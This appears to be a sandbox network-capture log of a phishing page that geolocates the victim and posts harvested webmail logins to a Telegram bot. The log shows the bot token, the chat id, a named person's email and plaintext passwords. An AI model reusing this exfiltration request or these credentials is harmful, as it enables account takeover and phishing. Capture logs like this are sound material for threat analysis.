                                                                                                                                          2024-11-28 10:32:22 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 32 32 38 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                                                                          Data Ascii: { "ip": "8.46.123.228", "hostname": "static-cpe-8-46-123-228.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          24192.168.2.4497768.8.8.84432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:21 UTC589OUTGET /resolve?name=agriparadigma.it&type=MX HTTP/1.1
                                                                                                                                          Host: dns.google
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Origin: https://igacorp.conohawing.com
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://igacorp.conohawing.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:22 UTC549INHTTP/1.1 200 OK
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:22 GMT
                                                                                                                                          Expires: Thu, 28 Nov 2024 10:32:22 GMT
                                                                                                                                          Cache-Control: private, max-age=21600
                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                          Server: HTTP server (unknown)
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Accept-Ranges: none
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          2024-11-28 10:32:22 UTC267INData Raw: 31 30 34 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 61 67 72 69 70 61 72 61 64 69 67 6d 61 2e 69 74 2e 22 2c 22 74 79 70 65 22 3a 31 35 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 61 67 72 69 70 61 72 61 64 69 67 6d 61 2e 69 74 2e 22 2c 22 74 79 70 65 22 3a 31 35 2c 22 54 54 4c 22 3a 32 31 36 30 30 2c 22 64 61 74 61 22 3a 22 31 30 20 6d 78 70 6f 6f 6c 2e 64 65 32 2e 68 6f 73 74 65 64 6f 66 66 69 63 65 2e 61 67 2e 22 7d 5d 2c 22 43 6f 6d 6d 65 6e 74 22 3a 22 52 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 32 31 32 2e 32 35
                                                                                                                                          Data Ascii: 104{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"agriparadigma.it.","type":15}],"Answer":[{"name":"agriparadigma.it.","type":15,"TTL":21600,"data":"10 mxpool.de2.hostedoffice.ag."}],"Comment":"Response from 212.25
                                                                                                                                          2024-11-28 10:32:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          25192.168.2.44974223.218.208.109443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:22 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Encoding: identity
                                                                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                          Range: bytes=0-2147483646
                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                          2024-11-28 10:32:23 UTC534INHTTP/1.1 200 OK
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                          ApiVersion: Distribute 1.1
                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                          X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                          Cache-Control: public, max-age=57982
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:22 GMT
                                                                                                                                          Content-Length: 55
                                                                                                                                          Connection: close
                                                                                                                                          X-CID: 2
                                                                                                                                          2024-11-28 10:32:23 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          26192.168.2.4497788.8.8.84432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:23 UTC371OUTGET /resolve?name=agriparadigma.it&type=MX HTTP/1.1
                                                                                                                                          Host: dns.google
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:24 UTC549INHTTP/1.1 200 OK
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:24 GMT
                                                                                                                                          Expires: Thu, 28 Nov 2024 10:32:24 GMT
                                                                                                                                          Cache-Control: private, max-age=21600
                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                          Server: HTTP server (unknown)
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Accept-Ranges: none
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          2024-11-28 10:32:24 UTC267INData Raw: 31 30 34 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 61 67 72 69 70 61 72 61 64 69 67 6d 61 2e 69 74 2e 22 2c 22 74 79 70 65 22 3a 31 35 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 61 67 72 69 70 61 72 61 64 69 67 6d 61 2e 69 74 2e 22 2c 22 74 79 70 65 22 3a 31 35 2c 22 54 54 4c 22 3a 32 31 36 30 30 2c 22 64 61 74 61 22 3a 22 31 30 20 6d 78 70 6f 6f 6c 2e 64 65 32 2e 68 6f 73 74 65 64 6f 66 66 69 63 65 2e 61 67 2e 22 7d 5d 2c 22 43 6f 6d 6d 65 6e 74 22 3a 22 52 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 38 35 2e 39 34 2e
                                                                                                                                          Data Ascii: 104{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"agriparadigma.it.","type":15}],"Answer":[{"name":"agriparadigma.it.","type":15,"TTL":21600,"data":"10 mxpool.de2.hostedoffice.ag."}],"Comment":"Response from 85.94.
                                                                                                                                          2024-11-28 10:32:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          27192.168.2.449779149.154.167.2204432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:23 UTC748OUTPOST /bot7569984569:AAHY-ZYlm2R_gaIAe2xifFZ7ATgkuW-WPcs/sendMessage HTTP/1.1
                                                                                                                                          Host: api.telegram.org
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 686
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Origin: https://igacorp.conohawing.com
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://igacorp.conohawing.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:23 UTC686OUTData Raw: 63 68 61 74 5f 69 64 3d 35 39 36 31 32 37 36 34 39 33 26 74 65 78 74 3d 2d 2d 2d 2d 2d 2d 2d 2d 25 32 42 2b 47 65 6e 65 72 61 6c 2b 57 65 62 6d 61 69 6c 2b 52 65 5a 75 6c 54 2b 4e 65 77 2b 59 6f 72 6b 2b 43 69 74 79 2b 4e 65 77 2b 59 6f 72 6b 25 32 43 2b 55 53 2b 25 32 42 2d 2d 2d 2d 2d 2d 2d 2d 25 30 41 45 6d 61 69 6c 2b 25 33 41 2b 67 69 61 6e 70 69 65 72 6f 2e 6c 75 63 69 61 6e 69 25 34 30 61 67 72 69 70 61 72 61 64 69 67 6d 61 2e 69 74 25 30 41 50 61 73 73 77 6f 72 64 2b 25 33 41 2b 39 47 79 25 37 42 74 57 6d 78 46 36 47 25 30 41 43 68 65 63 6b 65 72 25 33 41 2b 67 69 61 6e 70 69 65 72 6f 2e 6c 75 63 69 61 6e 69 25 34 30 61 67 72 69 70 61 72 61 64 69 67 6d 61 2e 69 74 25 33 41 39 47 79 25 37 42 74 57 6d 78 46 36 47 25 30 41 42 72 6f 77 73 65 72 2b 25
                                                                                                                                          Data Ascii: chat_id=5961276493&text=--------%2B+General+Webmail+ReZulT+New+York+City+New+York%2C+US+%2B--------%0AEmail+%3A+gianpiero.luciani%40agriparadigma.it%0APassword+%3A+9Gy%7BtWmxF6G%0AChecker%3A+gianpiero.luciani%40agriparadigma.it%3A9Gy%7BtWmxF6G%0ABrowser+%
                                                                                                                                          2024-11-28 10:32:24 UTC389INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:24 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 1051
                                                                                                                                          Connection: close
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                          2024-11-28 10:32:24 UTC1051INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 36 39 39 38 34 35 36 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 65 72 76 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 41 6c 6c 73 65 72 76 65 72 64 61 74 61 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 39 36 31 32 37 36 34 39 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 4f 4d 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 61 66 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 37 38 39 39 34 34 2c 22 74 65 78 74 22 3a 22 2d 2d 2d 2d 2d 2d 2d 2d 2b 20 47
                                                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":195,"from":{"id":7569984569,"is_bot":true,"first_name":"server","username":"Allserverdata_bot"},"chat":{"id":5961276493,"first_name":"GOM","last_name":"\ud83d\udcaf","type":"private"},"date":1732789944,"text":"--------+ G


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          28192.168.2.449781149.154.167.2204432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:26 UTC401OUTGET /bot7569984569:AAHY-ZYlm2R_gaIAe2xifFZ7ATgkuW-WPcs/sendMessage HTTP/1.1
                                                                                                                                          Host: api.telegram.org
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:26 UTC346INHTTP/1.1 400 Bad Request
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:26 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 80
                                                                                                                                          Connection: close
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                          2024-11-28 10:32:26 UTC80INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d
                                                                                                                                          Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          29192.168.2.44978234.117.59.814432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:34 UTC555OUTGET /json HTTP/1.1
                                                                                                                                          Host: ipinfo.io
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Origin: https://igacorp.conohawing.com
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://igacorp.conohawing.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:34 UTC345INHTTP/1.1 200 OK
                                                                                                                                          access-control-allow-origin: *
                                                                                                                                          Content-Length: 321
                                                                                                                                          content-type: application/json; charset=utf-8
                                                                                                                                          date: Thu, 28 Nov 2024 10:32:34 GMT
                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                          via: 1.1 google
                                                                                                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-28 10:32:34 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 32 32 38 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                                                                          Data Ascii: { "ip": "8.46.123.228", "hostname": "static-cpe-8-46-123-228.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          30192.168.2.44978434.117.59.814432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:36 UTC337OUTGET /json HTTP/1.1
                                                                                                                                          Host: ipinfo.io
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:36 UTC345INHTTP/1.1 200 OK
                                                                                                                                          access-control-allow-origin: *
                                                                                                                                          Content-Length: 321
                                                                                                                                          content-type: application/json; charset=utf-8
                                                                                                                                          date: Thu, 28 Nov 2024 10:32:36 GMT
                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                          via: 1.1 google
                                                                                                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-28 10:32:36 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 32 32 38 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                                                                          Data Ascii: { "ip": "8.46.123.228", "hostname": "static-cpe-8-46-123-228.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          31192.168.2.449783149.154.167.2204432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:36 UTC748OUTPOST /bot7569984569:AAHY-ZYlm2R_gaIAe2xifFZ7ATgkuW-WPcs/sendMessage HTTP/1.1
                                                                                                                                          Host: api.telegram.org
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 698
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Origin: https://igacorp.conohawing.com
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://igacorp.conohawing.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:36 UTC698OUTData Raw: 63 68 61 74 5f 69 64 3d 35 39 36 31 32 37 36 34 39 33 26 74 65 78 74 3d 2d 2d 2d 2d 2d 2d 2d 2d 25 32 42 2b 47 65 6e 65 72 61 6c 2b 57 65 62 6d 61 69 6c 2b 52 65 5a 75 6c 54 2b 4e 65 77 2b 59 6f 72 6b 2b 43 69 74 79 2b 4e 65 77 2b 59 6f 72 6b 25 32 43 2b 55 53 2b 25 32 42 2d 2d 2d 2d 2d 2d 2d 2d 25 30 41 45 6d 61 69 6c 2b 25 33 41 2b 67 69 61 6e 70 69 65 72 6f 2e 6c 75 63 69 61 6e 69 25 34 30 61 67 72 69 70 61 72 61 64 69 67 6d 61 2e 69 74 25 30 41 50 61 73 73 77 6f 72 64 2b 25 33 41 2b 25 32 36 25 33 41 51 6b 25 37 42 36 70 62 25 33 42 38 50 25 30 41 43 68 65 63 6b 65 72 25 33 41 2b 67 69 61 6e 70 69 65 72 6f 2e 6c 75 63 69 61 6e 69 25 34 30 61 67 72 69 70 61 72 61 64 69 67 6d 61 2e 69 74 25 33 41 25 32 36 25 33 41 51 6b 25 37 42 36 70 62 25 33 42 38 50
                                                                                                                                          Data Ascii: chat_id=5961276493&text=--------%2B+General+Webmail+ReZulT+New+York+City+New+York%2C+US+%2B--------%0AEmail+%3A+gianpiero.luciani%40agriparadigma.it%0APassword+%3A+%26%3AQk%7B6pb%3B8P%0AChecker%3A+gianpiero.luciani%40agriparadigma.it%3A%26%3AQk%7B6pb%3B8P
                                                                                                                                          2024-11-28 10:32:36 UTC389INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:36 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 1053
                                                                                                                                          Connection: close
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                          2024-11-28 10:32:36 UTC1053INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 36 39 39 38 34 35 36 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 65 72 76 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 41 6c 6c 73 65 72 76 65 72 64 61 74 61 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 39 36 31 32 37 36 34 39 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 4f 4d 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 61 66 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 37 38 39 39 35 36 2c 22 74 65 78 74 22 3a 22 2d 2d 2d 2d 2d 2d 2d 2d 2b 20 47
                                                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":196,"from":{"id":7569984569,"is_bot":true,"first_name":"server","username":"Allserverdata_bot"},"chat":{"id":5961276493,"first_name":"GOM","last_name":"\ud83d\udcaf","type":"private"},"date":1732789956,"text":"--------+ G


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          32192.168.2.449785149.154.167.2204432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:38 UTC401OUTGET /bot7569984569:AAHY-ZYlm2R_gaIAe2xifFZ7ATgkuW-WPcs/sendMessage HTTP/1.1
                                                                                                                                          Host: api.telegram.org
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
